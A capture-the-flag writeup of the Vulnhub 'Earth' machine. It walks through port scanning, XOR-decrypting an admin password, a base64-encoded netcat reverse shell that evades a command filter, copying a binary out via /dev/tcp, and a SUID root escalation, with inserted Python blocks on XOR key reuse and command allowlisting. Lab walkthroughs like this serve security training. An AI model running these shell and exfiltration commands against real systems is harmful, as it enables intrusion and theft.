Earth - The Planets - Vulnhub - Writeup — Security (2024)

Earth is a CTF machine from Vulnhub created by SirFlash. This is the third machine from his series “The Planets” and the previous machine “Venus” was equally great. As the author said, the difficulty is subjective to the experience. And, for me, I had to take hints for the root privilege escalation. The machine works well on VirtualBox.

Link to the machine:,755/

Step 1: Identify the IP address

As usual, I started the enumeration by identifying the IP address of the target machine (because I use machines on headless mode to avoid disturbances).

┌──(kali㉿kali)-[~/vulnhub/earth]
└─$ fping -aqg

As we can see, the IP address of my machine is and that of the target is

Step 2: Scan open ports

Next, I scanned the open ports on the target.

┌──(kali㉿kali)-[~/vulnhub/earth]
└─$ nmap -v -T4 -p- -sC -sV -oN nmap.log
Nmap 7.92 scan initiated Wed Dec 15 19:47:53 2021 as: nmap -v -T4 -p- -sC -sV -oN nmap.log
scan report for is up (0.032s latency).
Not shown: 65209 filtered tcp ports (no-response), 323 filtered tcp ports (host-unreach)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.6 (protocol 2.0)
| ssh-hostkey:
| 256 5b:2c:3f:dc:8b:76:e9:21:7b:d0:56:24:df:be:e9:a8 (ECDSA)
|_ 256 b0:3c:72:3b:72:21:26:ce:3a:84:e8:41:ec:c8:f8:41 (ED25519)
80/tcp open http Apache httpd 2.4.51 ((Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9)
|_http-server-header: Apache/2.4.51 (Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9
|_http-title: Bad Request (400)
443/tcp open ssl/http Apache httpd 2.4.51 ((Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9)
|_http-title: Bad Request (400)
| ssl-cert: Subject: commonName=earth.local/stateOrProvinceName=Space
| Subject Alternative Name: DNS:earth.local,
| Issuer: commonName=earth.local/stateOrProvinceName=Space
| Public Key type: rsa
| Public Key bits: 4096
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-10-12T23:26:31
| Not valid after: 2031-10-10T23:26:31
| MD5: 4efa 65d2 1a9e 0718 4b54 41da 3712 f187
|_SHA-1: 04db 5b29 a33f 8076 f16b 8a1b 581d 6988 db25 7651
|_ssl-date: TLS randomness does not represent time
|_http-server-header: Apache/2.4.51 (Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9
| tls-alpn:
|_ http/1.1
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at .
# Nmap done at Wed Dec 15 19:53:47 2021 -- 1 IP address (1 host up) scanned in 353.64 seconds

From the SSL certificate, I found two hostnames.

443/tcp open ssl/http Apache httpd 2.4.51 ((Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9)
|_http-title: Bad Request (400)
| ssl-cert: Subject: commonName=earth.local/stateOrProvinceName=Space
| Subject Alternative Name: DNS:earth.local,

So, I added these to my /etc/hosts file.

earth.local

Step 3: Enumerate the webserver

In the earth.local site, we have some encrypted messages that are signed with some keys.


Hence, we must identify the technique of the encryption. However, since we know it uses a message key, we have to identify it first.

This information is located in robots.txt of the website.

┌──(kali㉿kali)-[~/vulnhub/earth]
└─$ curl -k
User-Agent: *
# ... snip ...
Disallow: /testingnotes.*

Here, we can see there is a “testingnotes.*” file. Since this is a note, I guessed it would be a .txt file.

┌──(kali㉿kali)-[~/vulnhub/earth]
└─$ curl -k
Testing secure messaging system notes:
*Using XOR encryption as the algorithm, should be safe as used in RSA.
*Earth has confirmed they have received our sent messages.
*testdata.txt was used to test encryption.
*terra used as username for admin portal.
Todo:
*How do we send our monthly keys to Earth securely? Or should we change keys weekly?
*Need to test different key lengths to protect against bruteforce. How long should the key be?
*Need to improve the interface of the messaging interface and the admin panel, it's currently very basic.

From the note, we can confirm that the encryption algorithm is XOR and the key might be from testdata.txt. Likewise, the username for the admin portal is terra. Also, the admin portal is /admin on the other website.

┌──(kali㉿kali)-[~/vulnhub/earth]
└─$ curl -k
According to radiometric dating estimation and other evidence, Earth formed over 4.5 billion years ago. Within the first billion years of Earth's history, life appeared in the oceans and began to affect Earth's atmosphere and surface, leading to the proliferation of anaerobic and, later, aerobic organisms. Some geological evidence indicates that life may have arisen as early as 4.1 billion years ago.

With this information, I opened CyberChef and searched for XOR. I put the above text in the key part of CyberChef with UTF-8 input. The following message gave me the possible password of the user terra.
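The CyberChef step above, reproduced as a short script. This is an added example, not code from the original writeup or the target machine: the key is the opening sentence of testdata.txt as quoted above, the two messages are constructed samples, and all function names are hypothetical. It goes one step beyond the decryption to show why the notes' question about key length misses the point: one known message leaks the key bytes, which then decrypt any other message sent under the same key.

```python
from itertools import cycle

# Opening sentence of testdata.txt as quoted in the writeup, used here as the key.
KEY_TEXT = ("According to radiometric dating estimation and other evidence, "
            "Earth formed over 4.5 billion years ago.")

# Constructed sample messages (not the ciphertexts shown on the target site).
MSG_A = "constructed sample: monthly key rotation is pending"
MSG_B = "constructed sample: portal credentials go here later"


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR. The same call encrypts and decrypts."""
    return bytes(d ^ k for d, k in zip(data, cycle(key)))


def encrypt_to_hex(message: str, key_text: str) -> str:
    """Produce a hex string like the ones displayed on the messaging page."""
    return xor_bytes(message.encode("utf-8"), key_text.encode("utf-8")).hex()


def decrypt_hex(hex_ciphertext: str, key_text: str) -> str:
    """CyberChef equivalent: From Hex, then XOR with a UTF-8 key."""
    raw = xor_bytes(bytes.fromhex(hex_ciphertext), key_text.encode("utf-8"))
    return raw.decode("utf-8", errors="replace")


def recover_key_stream(hex_ciphertext: str, known_plaintext: str) -> bytes:
    """Ciphertext XOR known plaintext yields the key bytes that were used."""
    ct = bytes.fromhex(hex_ciphertext)
    return bytes(c ^ p for c, p in zip(ct, known_plaintext.encode("utf-8")))


def demo():
    ct_a = encrypt_to_hex(MSG_A, KEY_TEXT)
    ct_b = encrypt_to_hex(MSG_B, KEY_TEXT)
    # Case 1: the key file is readable on the web server, so decryption is direct.
    plain_a = decrypt_hex(ct_a, KEY_TEXT)
    # Case 2: no key file, but one message is known. The leaked key bytes
    # decrypt the same span of every other message under that key.
    leaked = recover_key_stream(ct_a, MSG_A)
    plain_b_prefix = xor_bytes(bytes.fromhex(ct_b)[:len(leaked)], leaked).decode("utf-8")
    return plain_a, leaked, plain_b_prefix


if __name__ == "__main__":
    for item in demo():
        print(item)
```

A longer key only lengthens the span that must be known; it does not help once the key is reused across messages or published next to them.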


With the password, I logged in earth.local/admin portal that gives us a CLI input.


When I tried to spawn a reverse shell, it said that remote connections are forbidden. This is because I used an IP address. Thus, we can bypass this by converting it to its decimal notation. Or, we can encode the command in the base64 format.

┌──(kali㉿kali)-[~/vulnhub/earth]
└─$ echo 'nc -e /bin/bash 9001' | base64
bmMgLWUgL2Jpbi9iYXNoIDEwLjAuMC40IDkwMDEK

Next, I listened on the port 9001.

┌──(kali㉿kali)-[~/vulnhub/earth]
└─$ nc -nlvp 9001
Ncat: Version 7.92 ( )
Ncat: Listening on :::9001
Ncat: Listening on

After this, I could use the base64 payload to spawn the reverse shell as follows.

echo bmMgLWUgL2Jpbi9iYXNoIDEwLjAuMC40IDkwMDEK | base64 -d | bash
┌──(kali㉿kali)-[~/vulnhub/earth]
└─$ nc -nlvp 9001
Ncat: Version 7.92 ( )
Ncat: Listening on :::9001
Ncat: Listening on
Connection from
Connection from
gid=48(apache) groups=48(apache)

We have to upgrade the shell after this.

Upgrade to an intelligent reverse shell
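Why the portal's "remote connections are forbidden" check did not hold, shown from the defender's side. This is an added example, not the machine's actual code: the denylist regex, the allowlisted program set and all function names are assumptions. The first sample address is constructed, and the encoded sample is the command line quoted above.

```python
import re
import shlex

# Hypothetical denylist modelled on the behaviour described in the writeup:
# the command is refused when its text contains a dotted-quad IP address.
DOTTED_QUAD = re.compile(r"\b\d{1,3}(?:\.\d{1,3}){3}\b")


def denylist_allows(command: str) -> bool:
    """Weak check: inspects only the literal text of the command."""
    return DOTTED_QUAD.search(command) is None


# Hardened form: a fixed set of programs with a fixed argument count
# (assumed set for this sketch) and no shell syntax at all.
ALLOWED_PROGRAMS = {"id": 0, "uptime": 0, "hostname": 0}
SHELL_METACHARS = set("|;&$`<>(){}\\\n")


def allowlist_allows(command: str) -> bool:
    """Accept only an allowlisted program with the expected number of arguments."""
    if SHELL_METACHARS & set(command):
        return False
    try:
        argv = shlex.split(command)
    except ValueError:  # unbalanced quotes
        return False
    if not argv:
        return False
    # An accepted argv should then be executed without a shell,
    # e.g. subprocess.run(argv, shell=False).
    return ALLOWED_PROGRAMS.get(argv[0]) == len(argv) - 1


SAMPLES = [
    "id",
    "ping -c 1 192.0.2.10",  # constructed, documentation address range
    "echo bmMgLWUgL2Jpbi9iYXNoIDEwLjAuMC40IDkwMDEK | base64 -d | bash",  # from the writeup
]


def compare():
    """Return (command, denylist verdict, allowlist verdict) for each sample."""
    return [(c, denylist_allows(c), allowlist_allows(c)) for c in SAMPLES]


if __name__ == "__main__":
    for command, weak, strict in compare():
        print(f"denylist={weak!s:5} allowlist={strict!s:5} {command}")
```

The denylist judges how the input is spelled, so any encoding of the same command passes it; the allowlist judges what will be executed and never hands the string to a shell.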

Step 4: Root privilege escalation

Once I had a proper shell, I checked for the SUID binaries.

bash-5.1$ find / -perm -u=s 2>/dev/null
# ... snip ...
/usr/bin/reset_root
# ... snip ...

When I checked the strings, I saw that it would change the password of the user root.

bash-5.1$ strings /usr/bin/reset_root
/lib64/
]\UH
credentiH
als rootH
:theEartH
hisflat
[]A\A]A^A_
CHECKING IF RESET TRIGGERS PRESENT...
RESET TRIGGERS ARE PRESENT, RESETTING ROOT PASSWORD TO: Earth
/usr/bin/echo 'root:Earth' | /usr/sbin/chpasswd
RESET FAILED, ALL TRIGGERS ARE NOT PRESENT.
;*3$"
# ... snip ...
puts@GLIBC_2.2.5
_edata
system@GLIBC_2.2.5
__libc_start_main@GLIBC_2.2.5
magic_cipher
# ... snip ...
main
access@GLIBC_2.2.5
__TMC_END__
setuid@GLIBC_2.2.5
# ... snip ...

However, when I ran the script, I got the message RESET FAILED, … Thus, I copied the binary to my local machine.

nc -nlvp 9002 > reset_root
cat /usr/bin/reset_root > /dev/tcp/

Next, I gave it the executable permission.

chmod +x reset_root

The other thing I did was reverse engineer the code.


As we can see, there is a function magic_cipher. Likewise, the password change operation only occurs when three conditions are met. So, we can use the ltrace binary to trace the library calls of an ELF binary.

┌──(kali㉿kali)-[~/vulnhub/earth]
└─$ ltrace ./reset_root
puts("CHECKING IF RESET TRIGGERS PRESE"...CHECKING IF RESET TRIGGERS PRESENT...
) = 38
access("/dev/shm/kHgTFI5G", 0) = -1
access("/dev/shm/Zw7bV9U5", 0) = -1
access("/tmp/kcM0Wewe", 0) = -1
puts("RESET FAILED, ALL TRIGGERS ARE N"...RESET FAILED, ALL TRIGGERS ARE NOT PRESENT.
) = 44
+++ exited (status 0) +++

From the output, we can see that the three files at the shown locations must be present for the reset to trigger. Therefore, I created those files on the target. Lastly, when I ran the binary, it changed the password of the root.

bash-5.1$ touch /dev/shm/kHgTFI5G /dev/shm/Zw7bV9U5 /tmp/kcM0Wewe
bash-5.1$ reset_root
CHECKING IF RESET TRIGGERS PRESENT...
RESET TRIGGERS ARE PRESENT, RESETTING ROOT PASSWORD TO: Earth
bash-5.1$ su -l
Password:
[root@earth ~]# id
uid=0(root) gid=0(root) groups=0(root)
[root@earth ~]#

Author: Nathanael Baumbach
